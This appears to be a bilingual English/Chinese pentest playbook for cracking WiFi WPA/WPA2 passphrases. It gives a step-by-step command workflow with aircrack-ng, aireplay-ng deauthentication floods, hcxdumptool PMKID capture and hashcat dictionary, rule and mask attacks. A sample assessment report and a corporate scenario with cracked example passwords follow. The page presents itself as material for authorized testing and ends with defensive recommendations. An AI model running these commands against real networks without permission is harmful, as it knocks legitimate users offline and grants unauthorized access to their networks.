Back to Details

performing-wifi-password-cracking-with-aircrack

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Performing WiFi Password Cracking with Aircrack-ng

使用Aircrack-ng进行WiFi密码破解

When to Use

使用场景

  • Assessing the strength of WPA/WPA2/WPA3 passphrases during authorized wireless penetration tests
  • Testing whether wireless networks are using weak or default passwords that can be cracked offline
  • Capturing and analyzing 4-way handshakes to evaluate wireless authentication security
  • Demonstrating the risks of WEP, weak WPA2 passphrases, and PMKID-based attacks to stakeholders
  • Validating that enterprise wireless networks use 802.1X/EAP instead of pre-shared keys
Do not use against wireless networks without explicit written authorization, for disrupting wireless communications, or for capturing handshakes of networks you do not have permission to test.
  • 在授权的无线渗透测试中评估WPA/WPA2/WPA3密码的强度
  • 测试无线网络是否使用可被离线破解的弱密码或默认密码
  • 捕获并分析四次握手包以评估无线认证安全性
  • 向利益相关方展示WEP、弱WPA2密码以及基于PMKID的攻击带来的风险
  • 验证企业无线网络是否使用802.1X/EAP而非预共享密钥
禁止使用场景:在未获得明确书面授权的情况下针对无线网络使用本方法;禁止用于干扰无线通信;禁止捕获无测试权限的网络的握手包。

Prerequisites

前置条件

  • Written authorization specifying in-scope SSIDs and wireless networks
  • Wireless adapter with monitor mode and packet injection support (Alfa AWUS036ACH, Alfa AWUS036ACM, or similar)
  • Kali Linux with aircrack-ng suite, hashcat, and hcxtools installed
  • Password wordlists (rockyou.txt, SecLists, or custom organization-specific lists)
  • GPU-capable system for hashcat acceleration (optional but recommended for large wordlists)
  • 指定测试范围内SSID和无线网络的书面授权
  • 支持监听模式和数据包注入的无线适配器(如Alfa AWUS036ACH、Alfa AWUS036ACM或类似设备)
  • 安装了aircrack-ng套件、hashcat和hcxtools的Kali Linux系统
  • 密码字典(如rockyou.txt、SecLists或自定义的企业专属字典)
  • 支持GPU加速的系统(可选,但针对大型字典推荐使用)

Workflow

操作流程

Step 1: Prepare the Wireless Interface

步骤1:准备无线接口

bash
undefined
bash
undefined

Identify wireless interfaces

Identify wireless interfaces

iwconfig
iwconfig

or

or

iw dev
iw dev

Kill interfering processes

Kill interfering processes

sudo airmon-ng check kill
sudo airmon-ng check kill

Enable monitor mode

Enable monitor mode

sudo airmon-ng start wlan0
sudo airmon-ng start wlan0

Output: monitor mode enabled on wlan0mon

Output: monitor mode enabled on wlan0mon

Verify monitor mode

Verify monitor mode

iwconfig wlan0mon
iwconfig wlan0mon

Mode should show "Monitor"

Mode should show "Monitor"

Alternatively, enable monitor mode manually

Alternatively, enable monitor mode manually

sudo ip link set wlan0 down sudo iw dev wlan0 set type monitor sudo ip link set wlan0 up
undefined
sudo ip link set wlan0 down sudo iw dev wlan0 set type monitor sudo ip link set wlan0 up
undefined

Step 2: Scan for Target Networks

步骤2:扫描目标网络

bash
undefined
bash
undefined

Scan all channels for access points

Scan all channels for access points

sudo airodump-ng wlan0mon
sudo airodump-ng wlan0mon

Output columns:

Output columns:

BSSID PWR Beacons #Data CH ENC CIPHER AUTH ESSID

BSSID PWR Beacons #Data CH ENC CIPHER AUTH ESSID

AA:BB:CC:DD:EE:FF -45 120 35 6 WPA2 CCMP PSK TargetNetwork

AA:BB:CC:DD:EE:FF -45 120 35 6 WPA2 CCMP PSK TargetNetwork

Identify the target network parameters:

Identify the target network parameters:

- BSSID (MAC address of the access point)

- BSSID (MAC address of the access point)

- Channel number

- Channel number

- Encryption type (WPA2-PSK is the target)

- Encryption type (WPA2-PSK is the target)

- Connected clients (in the lower section)

- Connected clients (in the lower section)

Focus scanning on the target channel

Focus scanning on the target channel

sudo airodump-ng wlan0mon --channel 6 --bssid AA:BB:CC:DD:EE:FF -w capture
undefined
sudo airodump-ng wlan0mon --channel 6 --bssid AA:BB:CC:DD:EE:FF -w capture
undefined

Step 3: Capture the WPA2 4-Way Handshake

步骤3:捕获WPA2四次握手包

bash
undefined
bash
undefined

Method 1: Wait for a client to connect naturally

Method 1: Wait for a client to connect naturally

Keep airodump-ng running and wait for "WPA handshake: AA:BB:CC:DD:EE:FF" message

Keep airodump-ng running and wait for "WPA handshake: AA:BB:CC:DD:EE:FF" message

sudo airodump-ng wlan0mon --channel 6 --bssid AA:BB:CC:DD:EE:FF -w handshake_capture
sudo airodump-ng wlan0mon --channel 6 --bssid AA:BB:CC:DD:EE:FF -w handshake_capture

Method 2: Deauthenticate a client to force reconnection (active)

Method 2: Deauthenticate a client to force reconnection (active)

In a separate terminal, send deauth packets to a specific client

In a separate terminal, send deauth packets to a specific client

sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

Or deauth all clients (broadcast)

Or deauth all clients (broadcast)

sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon

Method 3: Capture PMKID from the AP (no client needed)

Method 3: Capture PMKID from the AP (no client needed)

Using hcxdumptool

Using hcxdumptool

sudo hcxdumptool -i wlan0mon --enable_status=1 -o pmkid_capture.pcapng
--filterlist_ap=AA:BB:CC:DD:EE:FF --filtermode=2
sudo hcxdumptool -i wlan0mon --enable_status=1 -o pmkid_capture.pcapng
--filterlist_ap=AA:BB:CC:DD:EE:FF --filtermode=2

Wait for "PMKID" message, then convert for hashcat

Wait for "PMKID" message, then convert for hashcat

hcxpcapngtool -o pmkid_hash.hc22000 pmkid_capture.pcapng
hcxpcapngtool -o pmkid_hash.hc22000 pmkid_capture.pcapng

Verify handshake was captured

Verify handshake was captured

aircrack-ng handshake_capture-01.cap
aircrack-ng handshake_capture-01.cap

Should show: "1 handshake" next to the target BSSID

Should show: "1 handshake" next to the target BSSID

Alternative verification with cowpatty

Alternative verification with cowpatty

cowpatty -r handshake_capture-01.cap -c
undefined
cowpatty -r handshake_capture-01.cap -c
undefined

Step 4: Crack with Aircrack-ng (CPU-based)

步骤4:使用Aircrack-ng破解(基于CPU)

bash
undefined
bash
undefined

Crack using rockyou wordlist

Crack using rockyou wordlist

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF handshake_capture-01.cap
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF handshake_capture-01.cap

Use multiple wordlists

Use multiple wordlists

aircrack-ng -w /usr/share/wordlists/rockyou.txt,/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
-b AA:BB:CC:DD:EE:FF handshake_capture-01.cap
aircrack-ng -w /usr/share/wordlists/rockyou.txt,/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
-b AA:BB:CC:DD:EE:FF handshake_capture-01.cap

Crack with a specific ESSID

Crack with a specific ESSID

aircrack-ng -w /usr/share/wordlists/rockyou.txt -e "TargetNetwork" handshake_capture-01.cap
aircrack-ng -w /usr/share/wordlists/rockyou.txt -e "TargetNetwork" handshake_capture-01.cap

If successful, output shows:

If successful, output shows:

KEY FOUND! [ password123 ]

KEY FOUND! [ password123 ]

undefined
undefined

Step 5: Crack with Hashcat (GPU-accelerated)

步骤5:使用Hashcat破解(GPU加速)

bash
undefined
bash
undefined

Convert capture to hashcat format

Convert capture to hashcat format

For handshake captures:

For handshake captures:

hcxpcapngtool -o hashcat_input.hc22000 handshake_capture-01.cap
hcxpcapngtool -o hashcat_input.hc22000 handshake_capture-01.cap

Or use aircrack-ng conversion

Or use aircrack-ng conversion

aircrack-ng handshake_capture-01.cap -j hashcat_input
aircrack-ng handshake_capture-01.cap -j hashcat_input

Dictionary attack with hashcat

Dictionary attack with hashcat

hashcat -m 22000 hashcat_input.hc22000 /usr/share/wordlists/rockyou.txt
hashcat -m 22000 hashcat_input.hc22000 /usr/share/wordlists/rockyou.txt

Rule-based attack (transforms dictionary words)

Rule-based attack (transforms dictionary words)

hashcat -m 22000 hashcat_input.hc22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 22000 hashcat_input.hc22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

Brute force 8-character numeric passwords

Brute force 8-character numeric passwords

hashcat -m 22000 hashcat_input.hc22000 -a 3 ?d?d?d?d?d?d?d?d
hashcat -m 22000 hashcat_input.hc22000 -a 3 ?d?d?d?d?d?d?d?d

Combination attack (two wordlists combined)

Combination attack (two wordlists combined)

hashcat -m 22000 hashcat_input.hc22000 -a 1 wordlist1.txt wordlist2.txt
hashcat -m 22000 hashcat_input.hc22000 -a 1 wordlist1.txt wordlist2.txt

Mask attack for common patterns (Word + 4 digits)

Mask attack for common patterns (Word + 4 digits)

hashcat -m 22000 hashcat_input.hc22000 -a 3 -1 ?l?u ?1?1?1?1?1?d?d?d?d
hashcat -m 22000 hashcat_input.hc22000 -a 3 -1 ?l?u ?1?1?1?1?1?d?d?d?d

For PMKID-specific hashes

For PMKID-specific hashes

hashcat -m 22000 pmkid_hash.hc22000 /usr/share/wordlists/rockyou.txt
hashcat -m 22000 pmkid_hash.hc22000 /usr/share/wordlists/rockyou.txt

Show cracked password

Show cracked password

hashcat -m 22000 hashcat_input.hc22000 --show
undefined
hashcat -m 22000 hashcat_input.hc22000 --show
undefined

Step 6: Document and Clean Up

步骤6:记录与清理

bash
undefined
bash
undefined

Stop monitor mode

Stop monitor mode

sudo airmon-ng stop wlan0mon
sudo airmon-ng stop wlan0mon

Restart networking services

Restart networking services

sudo systemctl restart NetworkManager
sudo systemctl restart NetworkManager

Generate report

Generate report

cat > wifi_assessment_report.txt << 'EOF' WiFi Security Assessment Results

Target SSID: TargetNetwork BSSID: AA:BB:CC:DD:EE:FF Encryption: WPA2-PSK (CCMP) Channel: 6
Handshake Capture: Successful (Method: Client deauthentication) Cracking Result: PASSWORD FOUND Password: [documented securely] Time to Crack: 3 minutes 47 seconds (rockyou.txt, hashcat GPU)
Recommendation: Change to a passphrase of 15+ characters with mixed case, numbers, and symbols, or migrate to WPA2/WPA3-Enterprise with 802.1X. EOF

cat > wifi_assessment_report.txt << 'EOF' WiFi Security Assessment Results

Target SSID: TargetNetwork BSSID: AA:BB:CC:DD:EE:FF Encryption: WPA2-PSK (CCMP) Channel: 6
Handshake Capture: Successful (Method: Client deauthentication) Cracking Result: PASSWORD FOUND Password: [documented securely] Time to Crack: 3 minutes 47 seconds (rockyou.txt, hashcat GPU)
Recommendation: Change to a passphrase of 15+ characters with mixed case, numbers, and symbols, or migrate to WPA2/WPA3-Enterprise with 802.1X. EOF

Securely handle capture files (contain sensitive authentication material)

Securely handle capture files (contain sensitive authentication material)

sha256sum handshake_capture-01.cap > evidence_hashes.txt
sha256sum handshake_capture-01.cap > evidence_hashes.txt

Transfer to secure evidence storage per engagement agreement

Transfer to secure evidence storage per engagement agreement

undefined
undefined

Key Concepts

核心概念

TermDefinition
4-Way HandshakeWPA/WPA2 authentication exchange between client and AP that derives session keys from the PSK, captured for offline password cracking
PMKIDPairwise Master Key Identifier included in the first EAPOL frame from the AP, allowing password cracking without capturing the full handshake or requiring a connected client
Monitor ModeWireless interface mode that captures all wireless frames on a channel without associating with any access point
Deauthentication AttackSending forged 802.11 management frames to disconnect a client from the AP, forcing a reconnection that generates a capturable handshake
PSK (Pre-Shared Key)Static password used by all users to authenticate to a WPA/WPA2-Personal network, vulnerable to offline dictionary attacks
802.1X/EAPEnterprise wireless authentication using RADIUS that provides per-user credentials, eliminating the shared password vulnerability
术语定义
4-Way HandshakeWPA/WPA2中客户端与AP之间的认证交互过程,从PSK派生会话密钥,可被捕获用于离线密码破解
PMKIDAP发送的首个EAPOL帧中包含的成对主密钥标识符,无需捕获完整握手包或连接客户端即可进行密码破解
Monitor Mode无线接口模式,无需关联任何接入点即可捕获信道上的所有无线帧
Deauthentication Attack发送伪造的802.11管理帧使客户端与AP断开连接,迫使其重新连接以生成可捕获的握手包
PSK (Pre-Shared Key)所有用户用于认证WPA/WPA2-Personal网络的静态密码,易受离线字典攻击
802.1X/EAP使用RADIUS的企业无线认证方式,提供每个用户的独立凭证,消除共享密码漏洞

Tools & Systems

工具与系统

  • aircrack-ng suite: Comprehensive wireless security toolkit including airodump-ng (capture), aireplay-ng (injection), and aircrack-ng (cracking)
  • hashcat: GPU-accelerated password cracker supporting WPA/WPA2 handshakes (mode 22000) with dictionary, rule, and mask attacks
  • hcxtools: Tools for capturing PMKID and converting wireless captures to hashcat-compatible formats
  • hcxdumptool: Capture tool specifically designed for PMKID extraction without requiring client deauthentication
  • cowpatty: WPA/WPA2 cracking tool with precomputed hash table support for faster dictionary attacks
  • aircrack-ng suite: 全面的无线安全工具包,包含airodump-ng(捕获)、aireplay-ng(注入)和aircrack-ng(破解)
  • hashcat: 支持GPU加速的密码破解工具,可处理WPA/WPA2握手包(模式22000),支持字典、规则和掩码攻击
  • hcxtools: 用于捕获PMKID并将无线捕获文件转换为Hashcat兼容格式的工具
  • hcxdumptool: 专门用于提取PMKID的捕获工具,无需客户端解除认证
  • cowpatty: WPA/WPA2破解工具,支持预计算哈希表以加快字典攻击速度

Common Scenarios

常见场景

Scenario: Wireless Penetration Test for a Corporate Office

场景:企业办公室无线渗透测试

Context: A financial services company wants to assess the security of their wireless networks. They have three SSIDs: Corp-WiFi (WPA2-Enterprise for employees), Guest-WiFi (WPA2-PSK for visitors), and IoT-WiFi (WPA2-PSK for IoT devices). The assessment is authorized to test all three networks.
Approach:
  1. Scan for all three SSIDs and identify their BSSIDs, channels, and encryption types
  2. Verify that Corp-WiFi uses 802.1X/EAP by examining beacon frames -- confirmed, no PSK to crack
  3. Capture the 4-way handshake for Guest-WiFi by deauthenticating a connected device and capturing the reconnection
  4. Run hashcat with rockyou.txt against the Guest-WiFi handshake -- password "Welcome2024!" cracked in 47 seconds
  5. Capture PMKID from IoT-WiFi access point (no client deauth needed) and crack with hashcat -- password "iot12345" found in 12 seconds
  6. Demonstrate that Guest-WiFi and IoT-WiFi passwords are weak and easily crackable
  7. Recommend migrating Guest-WiFi to a captive portal with per-session passwords and strengthening IoT-WiFi to a 20+ character passphrase
Pitfalls:
  • Sending excessive deauth frames that disrupt legitimate wireless users beyond the test scope
  • Not using a wireless adapter that supports the target network's frequency band (2.4 GHz vs 5 GHz)
  • Attempting to crack WPA3-SAE networks with traditional handshake capture (SAE is resistant to offline attacks)
  • Running GPU cracking on shared systems without monitoring temperature and power consumption
背景: 一家金融服务公司希望评估其无线网络的安全性。他们有三个SSID:Corp-WiFi(供员工使用的WPA2-Enterprise)、Guest-WiFi(供访客使用的WPA2-PSK)和IoT-WiFi(供IoT设备使用的WPA2-PSK)。评估已获授权可测试所有三个网络。
方法:
  1. 扫描所有三个SSID,确定其BSSID、信道和加密类型
  2. 通过检查 beacon 帧验证Corp-WiFi是否使用802.1X/EAP——确认无误,无PSK可破解
  3. 通过解除已连接设备的认证并捕获重新连接过程,捕获Guest-WiFi的四次握手包
  4. 使用rockyou.txt通过Hashcat破解Guest-WiFi握手包——密码"Welcome2024!"在47秒内被破解
  5. 从IoT-WiFi接入点捕获PMKID(无需客户端解除认证)并通过Hashcat破解——密码"iot12345"在12秒内被找到
  6. 向客户展示Guest-WiFi和IoT-WiFi的密码过于薄弱,极易被破解
  7. 建议将Guest-WiFi迁移至带有会话专属密码的 captive portal,并将IoT-WiFi密码强化为20位以上的随机密码
注意事项:
  • 发送过多解除认证帧,超出测试范围干扰合法无线用户
  • 使用不支持目标网络频段(2.4 GHz vs 5 GHz)的无线适配器
  • 尝试使用传统握手包捕获方法破解WPA3-SAE网络(SAE可抵御离线攻击)
  • 在共享系统上运行GPU破解而不监控温度和功耗

Output Format

输出格式

undefined
undefined

Wireless Security Assessment Report

无线安全评估报告

Assessment Date: 2024-03-15 Location: Corporate Office, Building A
评估日期: 2024-03-15 地点: 企业办公室A栋

Network Inventory

网络清单

SSIDBSSIDEncryptionAuthChannelCrackable
Corp-WiFiAA:BB:CC:11:22:33WPA2802.1X36N/A (Enterprise)
Guest-WiFiAA:BB:CC:44:55:66WPA2PSK6YES - 47 seconds
IoT-WiFiAA:BB:CC:77:88:99WPA2PSK1YES - 12 seconds
SSIDBSSID加密方式认证方式信道是否可破解
Corp-WiFiAA:BB:CC:11:22:33WPA2802.1X36不适用(企业版)
Guest-WiFiAA:BB:CC:44:55:66WPA2PSK6是 - 47秒
IoT-WiFiAA:BB:CC:77:88:99WPA2PSK1是 - 12秒

Findings

发现问题

Finding 1: Weak Guest-WiFi Password (High)
  • Password: "Welcome2024!" (cracked via dictionary in 47 seconds)
  • Present in rockyou.txt top 100,000 entries
  • Shared among all visitors with no rotation policy
Finding 2: Trivial IoT-WiFi Password (Critical)
  • Password: "iot12345" (cracked in 12 seconds)
  • Default-pattern password providing access to IoT device network
  • No network segmentation between IoT-WiFi and corporate resources
问题1:Guest-WiFi密码薄弱(高风险)
  • 密码:"Welcome2024!"(通过字典攻击在47秒内破解)
  • 属于rockyou.txt前100,000条记录
  • 所有访客共享该密码,无轮换策略
问题2:IoT-WiFi密码极易破解(严重风险)
  • 密码:"iot12345"(12秒内被破解)
  • 属于默认模式密码,可访问IoT设备网络
  • IoT-WiFi与企业资源之间无网络隔离

Recommendations

建议

  1. Migrate Guest-WiFi to captive portal with per-session credentials
  2. Change IoT-WiFi to 20+ character random passphrase with quarterly rotation
  3. Implement network segmentation isolating IoT VLAN from corporate resources
  4. Consider WPA3-SAE for PSK networks to prevent offline cracking
  5. Enable 802.11w Protected Management Frames to prevent deauth attacks
undefined
  1. 将Guest-WiFi迁移至带有会话专属凭证的 captive portal
  2. 将IoT-WiFi密码改为20位以上的随机密码,并每季度轮换
  3. 实施网络隔离,将IoT VLAN与企业资源分隔开
  4. 考虑为PSK网络使用WPA3-SAE以防止离线破解
  5. 启用802.11w受保护管理帧以抵御解除认证攻击
undefined